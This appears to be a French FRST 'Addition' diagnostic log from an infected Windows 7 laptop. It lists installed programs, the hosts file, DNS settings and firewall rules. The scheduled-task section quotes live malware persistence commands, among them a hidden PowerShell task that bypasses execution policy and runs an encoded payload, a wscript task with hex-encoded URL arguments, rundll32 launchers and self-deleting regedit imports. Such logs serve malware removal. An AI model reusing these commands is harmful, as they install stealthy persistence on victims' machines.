Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 09-12-2017 Exécuté par C-3PO (09-12-2017 18:04:24) Exécuté depuis C:\Users\C-3PO\Downloads Windows 7 Professional Service Pack 1 (X64) (2016-07-18 07:13:51) Mode d'amorçage: Normal ========================================================== ==================== Comptes: ============================= Administrateur (S-1-5-21-1342067083-540354075-4242860494-500 - Administrator - Disabled) C-3PO (S-1-5-21-1342067083-540354075-4242860494-1000 - Administrator - Enabled) => C:\Users\C-3PO HomeGroupUser$ (S-1-5-21-1342067083-540354075-4242860494-1002 - Limited - Enabled) Invité (S-1-5-21-1342067083-540354075-4242860494-501 - Limited - Disabled) ==================== Centre de sécurité ======================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.) AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Programmes installés ====================== (Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.) Adblock Plus pour IE (32-bits et 64-bits) (HKLM\...\{40F6FB81-1B50-443B-A8E0-BC70E62CFB21}) (Version: 1.6 - Eyeo GmbH) Adobe Acrobat Reader DC - Français (HKLM-x32\...\{AC76BA86-7AD7-1036-7B44-AC0F074E4100}) (Version: 18.009.20050 - Adobe Systems Incorporated) Alcor Micro Smart Card Reader Driver (HKLM-x32\...\{F24F876B-7D71-4BD6-88E9-614D3BB84216}) (Version: 1.7.16.0 - Alcor Micro Corp.) Hidden Alcor Micro Smart Card Reader Driver (HKLM-x32\...\SZCCID) (Version: 1.7.16.0 - Alcor Micro Corp.) ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach) Broadcom 2070 Bluetooth 3.0 (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.6300 - Broadcom Corporation) Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version: 5.60.48.61 - Broadcom Corporation) Broadcom Wireless Utility (HKLM\...\Broadcom Wireless Utility) (Version: 5.60.48.61 - Broadcom Corporation) ByteFence Anti-Malware (HKLM-x32\...\ByteFence) (Version: 3.16.0.1 - Byte Technologies LLC) <==== ATTENTION Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.) Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.) Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.) DragonBoost (HKU\S-1-5-21-1342067083-540354075-4242860494-1000\...\119) (Version: - ) <==== ATTENTION FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version: - Image-Line) FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version: - Image-Line) Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.169 - Google Inc.) Hidden HP 3D DriveGuard (HKLM\...\{7D75E270-0888-4331-96CC-B2A823B1C370}) (Version: 4.1.4.1 - Hewlett-Packard Company) HP Connection Manager (HKLM-x32\...\{795AADBF-58C2-42D0-B779-E730702A247E}) (Version: 4.0.45.1 - Hewlett-Packard Company) HP DayStarter (HKLM\...\{6876B842-0B24-405D-8A24-9DA0BC44A524}) (Version: 2.0.0.12 - Hewlett-Packard Company) HP HotKey Support (HKLM\...\{8263B36C-A41E-4422-9031-1AE3641263AE}) (Version: 4.0.10.1 - Hewlett-Packard Company) HP Power Assistant (HKLM\...\{DB41CA83-E024-4B66-9A8B-2787D2DAFE57}) (Version: 2.0.2.0 - Hewlett-Packard Company) HP Webcam Driver (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.50058.0 - Sonix) IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6325.0 - IDT) IL Download Manager (HKLM-x32\...\IL Download Manager) (Version: - Image-Line) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation) Intel(R) Network Connections Drivers (HKLM\...\PROSet) (Version: 15.4 - Intel) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2291 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.1.2.1004 - Intel Corporation) JMicron 1394 Filter Driver (HKLM-x32\...\{13C96625-28E4-4c58-ADE0-CDAFC64752EB}) (Version: 1.00.20.00 - JMicron Technology Corp.) JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.56.1 - JMicron Technology Corp.) Joliebulle version 3.6 (HKLM-x32\...\{6192856F-8FBF-467C-A5E0-B5072405ED91}_is1) (Version: 3.6 - Pierre Tavares) Malwarebytes version 3.3.1.2183 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.3.1.2183 - Malwarebytes) Microsoft .NET Framework 4.7 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02053 - Microsoft Corporation) Microsoft Office Famille et Petite Entreprise 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Module linguistique Microsoft Visual Studio 2010 Tools pour Office Runtime (x64) - FRA (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - FRA) (Version: 10.0.50903 - Microsoft Corporation) Mozilla Firefox 57.0.2 (x64 fr) (HKLM\...\Mozilla Firefox 57.0.2 (x64 fr)) (Version: 57.0.2 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 57.0.2 - Mozilla) Online Application (HKLM-x32\...\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}) (Version: 2.6.0 - Microleaves) Hidden <==== ATTENTION Palikan (HKLM-x32\...\{2F7EC7BE-7FFE-163E-CE7E-66BE1EFEB53E}) (Version: - ) Scratch Live 2.5.0 (11) (HKLM-x32\...\{EA21EB55-073F-4CF5-A964-0412E755955A}) (Version: 2.5.0 - Serato Inc LP) SDK (HKLM-x32\...\{0DEA342C-15CB-4F52-97B6-06A9C4B9C06F}) (Version: 2.24.025 - Portrait Displays, Inc.) Hidden Search module (HKLM-x32\...\Search module) (Version: - Goobzo) <==== ATTENTION Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft) Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.18.25 - Synaptics Incorporated) Validity Fingerprint Sensor Driver (HKLM\...\{FFC3E41D-2C2B-45B7-9AD9-5EA19572DD26}) (Version: 4.3.117.0 - Validity Sensors, Inc.) VidsqaurE (HKLM-x32\...\{A97606DF-0FE1-4390-B0DD-ADA8B303AE61}_is1) (Version: 1.4 - ) <==== ATTENTION WinRAR 5.40 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH) ==================== Personnalisé CLSID (Avec liste blanche): ========================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-08-14] (Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2011-01-27] (Intel Corporation) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-08-14] (Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal) ==================== Tâches planifiées (Avec liste blanche) ============= (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {08494ACC-5AE0-4628-BF3B-D5F9E060FD48} - System32\Tasks\SoftUpgrade => C:\Program Files (x86)\SoftUpgrade\softup.exe [2017-08-23] () <==== ATTENTION Task: {0E375635-E892-43C0-A703-72EB1BF35A57} - System32\Tasks\MJHiy315mf => C:\Program Files (x86)\rkD7DjTUbV\updengine.exe <==== ATTENTION Task: {1296C4C9-A4CB-43A8-B212-A68F4B8C121A} - System32\Tasks\psv_Bamfind => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\Strongdex.reg" & del "C:\ProgramData\Quoteex\Strongdex.reg" & SCHTASKS /Delete /TN "psv_Bamfind" /F <==== ATTENTION Task: {152C23CD-2591-4D12-89C7-EF6C6BC05C9D} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe [2017-10-03] (Byte Technologies LLC) <==== ATTENTION Task: {1C102085-031F-4A82-91AF-FC30D8E3C513} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION Task: {2A5E1462-37C2-4023-9803-17BCD4FAD9AE} - System32\Tasks\psv_Alphait => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\Itdinity.reg" & del "C:\ProgramData\Quoteex\Itdinity.reg" & SCHTASKS /Delete /TN "psv_Alphait" /F <==== ATTENTION Task: {325A18BC-BF0C-4230-A5BA-8693CA1D49FE} - System32\Tasks\PC Clean Plus => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION Task: {3715CB8A-677A-43F0-8B4E-05F02A9B54B4} - System32\Tasks\Yahoo! Powered tesof => C:\Windows\system32\wscript.exe "C:\ProgramData\{F1CF34AC-7B8D-BE6A-FD4B-20286709ABE6}\fece.txt" "68747470733a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b46314346333441432d374238442d424536412d464434422d3230323836373039414245367d5c7361746f746f" "433a5c50726f6772616d446174615c7b46314346333441432d374238442d424536412d4644 (l'élément de données a 80 caractères en plus). <==== ATTENTION Task: {4230B0FC-CC97-4BAB-B830-4C84D9DB25FC} - System32\Tasks\2f125f0fbe8a9d4d50ade39a0d76fa2c => powershell.exe -NoProfile -NoLogo -NonInteractive -ExecutionPolicy Bypass -File "C:\Windows\2f125f0fbe8a9d4d50ade39a0d76fa2c.ps1" <==== ATTENTION Task: {5393FCD5-E1B1-4DE0-BD4C-924BBF57AA95} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION Task: {71E549D1-AF10-41E3-8CAD-56DAB31915F5} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-09-27] (Adobe Systems Incorporated) Task: {7BDC94A4-05A6-4229-B3A4-195363A86CB0} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-04-18] (Microleaves) <==== ATTENTION Task: {7D8B1D88-BA3A-40B5-BA8A-DF8523628A7A} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION Task: {8D5A27DA-41A5-449C-9ED2-DCBFA593FEAA} - System32\Tasks\{4391CE22-1A7E-3EF0-0D52-5586C8F87E1C} => C:\PROGRA~2\COMMON~1\4391CE~1\SYNCVE~1.EXE Task: {991E1A5E-AC00-4E60-928F-39B18A33A6F4} - System32\Tasks\psv_Tinlight => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\Lighttough.reg" & del "C:\ProgramData\Quoteex\Lighttough.reg" & SCHTASKS /Delete /TN "psv_Tinlight" /F <==== ATTENTION Task: {9D58D87A-560C-4979-B3C7-9F0B3E8AB0F4} - System32\Tasks\PC Clean Plus_UPDATES => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION Task: {B4B9F2B3-C7A3-4E2C-B24D-25BEF8092D22} - System32\Tasks\8c023e14d62cc32fcaee500b3f1fb4dd => sc start 8c023e14d62cc32fcaee500b3f1fb4dd <==== ATTENTION Task: {B64FEB13-6ECE-4C1B-BD8D-680FF76E41D0} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe <==== ATTENTION Task: {B6E99B9D-A1E4-4903-AA9F-97AD036251C9} - System32\Tasks\psv_Domflex => cmd.exe /c regedit.exe /s "C:\ProgramData\Quoteex\S-fax.reg" & del "C:\ProgramData\Quoteex\S-fax.reg" & SCHTASKS /Delete /TN "psv_Domflex" /F <==== ATTENTION Task: {C9BF127A-FD77-4573-A9DF-D14E151BC55E} - System32\Tasks\PnFXZuSqjm => C:\Program Files (x86)\jVddbi7Omy\updengine.exe <==== ATTENTION Task: {DC7047A6-950B-4469-95E7-EE3C7C47FAAD} - System32\Tasks\h1vGT0e3jr => C:\Program Files (x86)\aC0MAzjNgZ\updengine.exe <==== ATTENTION Task: {DD2713B0-2652-4EEA-AD34-18D8141DA007} - System32\Tasks\ADS DVD Burner => C:\Windows\system32\rundll32.exe "C:\Program Files\ADS DVD Burner\ADS DVD Burner.dll",vVkByOuobwZp <==== ATTENTION Task: {E3B6C88C-0B1C-4DAE-B45C-640073AFF9FE} - System32\Tasks\EditRyIde => C:\Windows\system32\rundll32.exe "C:\Program Files\EditRyIde\EditRyIde.dll",IQTWaLBM <==== ATTENTION Task: {E44163F4-8506-4B71-A750-814B62A9775F} - System32\Tasks\FastDataX Task => C:\PROGRA~2\FASTDA~1\FASTDA~1.EXE Task: {E7556430-47F3-4BB9-89D8-E435CC92D3CD} - System32\Tasks\Broadcom 1321F Wireless Mp525P => C:\Windows\system32\rundll32.exe "C:\Program Files\Broadcom 1321F Wireless Mp525P\Broadcom 1321F Wireless Mp525P.dll",RQsQpt <==== ATTENTION Task: {EBA12B14-21E3-4B65-8FF4-814012A42B00} - System32\Tasks\SMW_UpdateTask_Time_323136313635353832372d3237575a236c6c3255342a41 => wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION Task: {ED14CDD1-F50A-433B-A00B-079CB77466FE} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION Task: {F36C961C-8D9E-4171-910F-477C1865591A} - System32\Tasks\xy8EGwcCsXnF => xy8egwccsxnf.exe Task: {F57061BC-CFC7-4E68-A390-18678D54B00C} - System32\Tasks\PC Clean Plus_DEFAULT => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION Task: {F89AB432-15F2-4002-B939-7A6A5F9CFD8C} - System32\Tasks\{0D0F0447-0D7E-790C-7811-79050B0C110C} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ADsAIAA7ACAAOwAgADsAOwA7ACAAIAA7ADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUA (l'élément de données a 10000 caractères en plus). <==== ATTENTION Task: {F9537F5A-A4DC-4224-AB03-B1B2D4B6C331} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe <==== ATTENTION Task: {F9EE7113-FF80-4A9C-B60C-CAD83A043982} - System32\Tasks\SystemHealer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE <==== ATTENTION (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION Task: C:\Windows\Tasks\PC Clean Plus_DEFAULT.job => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION Task: C:\Windows\Tasks\PC Clean Plus_UPDATES.job => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ATTENTION Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION Task: C:\Windows\Tasks\{4391CE22-1A7E-3EF0-0D52-5586C8F87E1C}.job => C:\PROGRA~2\COMMON~1\4391CE~1\SYNCVE~1.EXE ==================== Raccourcis & WMI ======================== (Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.) Shortcut: C:\Users\C-3PO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Serato\Scratch LIVE\Install ASIO Drivers.lnk -> C:\Program Files (x86)\Serato\asio_installer.bat () ShortcutWithArgument: C:\Users\C-3PO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=H8Tzbcnbl1AU,ee0bb614-b1cc-4a5c-94bd-0f91703dfa0d, ShortcutWithArgument: C:\Users\C-3PO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=H8Tzbcnbl1AU,ee0bb614-b1cc-4a5c-94bd-0f91703dfa0d, ShortcutWithArgument: C:\Users\C-3PO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=H8Tzbcnbl1AU,ee0bb614-b1cc-4a5c-94bd-0f91703dfa0d, ShortcutWithArgument: C:\Users\C-3PO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=H8Tzbcnbl1AU,ee0bb614-b1cc-4a5c-94bd-0f91703dfa0d, ==================== Modules chargés (Avec liste blanche) ============== 2017-09-16 12:58 - 2015-06-01 03:24 - 002144768 _____ () C:\Program Files\ADS DVD Burner\ADS DVD Burner.dll 2016-07-18 08:33 - 2011-01-27 03:11 - 000094208 _____ () C:\Windows\System32\IccLibDll_x64.dll 2010-07-29 18:39 - 2010-07-29 18:39 - 000173856 _____ () C:\Program Files\WIDCOMM\Bluetooth Software\btkeyind.dll 2011-01-26 17:14 - 2011-01-26 17:14 - 000036408 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\HPPA_Remote.dll 2017-12-09 14:44 - 2017-12-09 14:44 - 000304456 _____ () C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe 2017-12-09 14:44 - 2017-12-09 14:44 - 000619848 _____ () C:\Program Files\ByteFence\rtop\bin\rtop_bg.exe 2011-01-26 17:13 - 2011-01-26 17:13 - 000080440 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\HardwareAccess.dll 2011-01-26 17:13 - 2011-01-26 17:13 - 000047160 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\Graphs.dll 2016-07-18 08:50 - 2011-01-26 16:34 - 001083392 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\System.Data.SQLite.dll 2010-06-24 01:21 - 2010-06-24 01:21 - 001102336 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\System.Data.SQLite.dll 2017-03-07 19:18 - 2017-03-07 19:18 - 000582936 _____ () C:\Program Files\ByteFence\rsLggr.exe 2017-12-09 16:44 - 2017-12-09 16:44 - 000516096 _____ () C:\Windows\TEMP\g2CFB.tmp.exe 2017-12-09 16:57 - 2017-12-09 16:57 - 002943360 _____ () C:\Users\C-3PO\Downloads\ZHPDiag3.exe 2017-08-29 10:38 - 2017-08-29 10:38 - 000862720 _____ () C:\Program Files (x86)\jVddbi7Omy\kl.dll 2010-06-24 01:19 - 2010-06-24 01:19 - 000514570 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\sqlite3.dll 2016-07-18 08:32 - 2011-01-13 02:56 - 000058880 ____R () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll ==================== Alternate Data Streams (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.) ==================== Mode sans échec (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Association (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.) ==================== Internet Explorer sites de confiance/sensibles =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.) ==================== Hosts contenu: ========================== (Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.) 2009-07-14 03:34 - 2017-12-09 16:34 - 000015502 _____ C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 wemsofts.com 127.0.0.1 bongadoom.com 127.0.0.1 wepcmainsystem.com 127.0.0.1 internalcampaigntargets.com 127.0.0.1 bongadoom.com 127.0.0.1 getthefilenow.com 127.0.0.1 bigpicturepop.com 127.0.0.1 wizzcaster.com 127.0.0.1 bestoffersfortoday.com 127.0.0.1 wepcmainsystem.com 127.0.0.1 agent.wizztrakys.com 127.0.0.1 csdimonetize.com 127.0.0.1 dl.azalee.site 127.0.0.1 titiaredh.com 127.0.0.1 wepcdisplaysystem.com 127.0.0.1 wepcanalyticsystem.com 127.0.0.1 healthydownload.com 127.0.0.1 leading2download.com 127.0.0.1 dwl0.wizzlabs.com 127.0.0.1 dwl1.wizzlabs.com 127.0.0.1 mess1.wizzmonetize.com 127.0.0.1 dl.azalee.site 127.0.0.1 dl.smashdl.com 127.0.0.1 downloadmyhost.com 127.0.0.1 lapapahoster.com 127.0.0.1 gf.tools.avast.com 127.0.0.1 pair.ff.avast.com 127.0.0.1 ipm-provider.ff.avast.com 127.0.0.1 ipm-provider.ff.avast.com 127.0.0.1 ipm-provider.ff.avast.com Il y a 392 plus de lignes. ==================== Autres zones ============================ (Actuellement, il n'y a pas de correction automatique pour cette section.) HKU\S-1-5-21-1342067083-540354075-4242860494-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\C-3PO\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 82.163.142.8 - 95.211.158.136 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0) Le Pare-feu est activé. ==================== MSCONFIG/TASK MANAGER éléments désactivés == ==================== RèglesPare-feu (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [{8C0B5E7D-8900-4300-8AD7-CEF9199DAA9E}] => (Allow) C:\Windows\system32\rundll32.exe FirewallRules: [{F13C6AAE-F7C7-40A8-B1C0-8DC245259323}] => (Allow) C:\Users\C-3PO\AppData\Local\Chromium\Application\chrome.exe FirewallRules: [{B078CC0B-4227-439C-89EC-905E5AD88ACF}] => (Allow) C:\Users\C-3PO\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe FirewallRules: [{1D3610F3-8E4E-4896-9623-A469497AE236}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{10C04D03-0B30-4F50-A663-91344AA412A4}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{11D9F36B-80A1-4FE1-A6A3-E03057094E3F}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{F49BD9D4-5153-4D98-9266-9DDBEC3B6138}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{B4EA3574-312E-4859-AFB2-97E2AD088264}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{F6CD6BF6-86DA-4893-B2AE-B5EB4A2BD017}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{235CCAB7-0768-47B5-869C-9060E7EE9D96}] => (Allow) C:\Windows\System32\rundll32.exe ==================== Points de restauration ========================= ==================== Éléments en erreur du Gestionnaire de périphériques ============= Name: Teredo Tunneling Pseudo-Interface Description: Microsoft Teredo Tunneling Adapter Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: tunnel Problem: : This device cannot start. (Code10) Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device. On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard. ==================== Erreurs du Journal des événements: ========================= Erreurs Application: ================== Error: (12/09/2017 05:51:49 PM) (Source: Validity USDK) (EventID: 40) (User: ) Description: SSL alert by host: Description is: 47. Error: (12/09/2017 04:58:35 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: AUTORITE NT) Description: Le déchargement des chaînes de compteurs de performances pour le service WmiApRpl (WmiApRpl) a échoué. Le premier DWORD de la section Data contient le code d’erreur. Error: (12/09/2017 04:58:35 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORITE NT) Description: Les chaînes de performance dans la valeur de Registre Performance sont endommagées lors du traitement du fournisseur de compteurs d’extension Performance. La valeur BaseIndex à partir du Registre de performance est le premier DWORD dans la section Données, la valeur LastCounter est le deuxième DWORD dans la section Données, et la valeur LastHelp est le troisième DWORD dans la section Données. Error: (12/09/2017 04:58:35 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORITE NT) Description: Les chaînes de performance dans la valeur de Registre Performance sont endommagées lors du traitement du fournisseur de compteurs d’extension Performance. La valeur 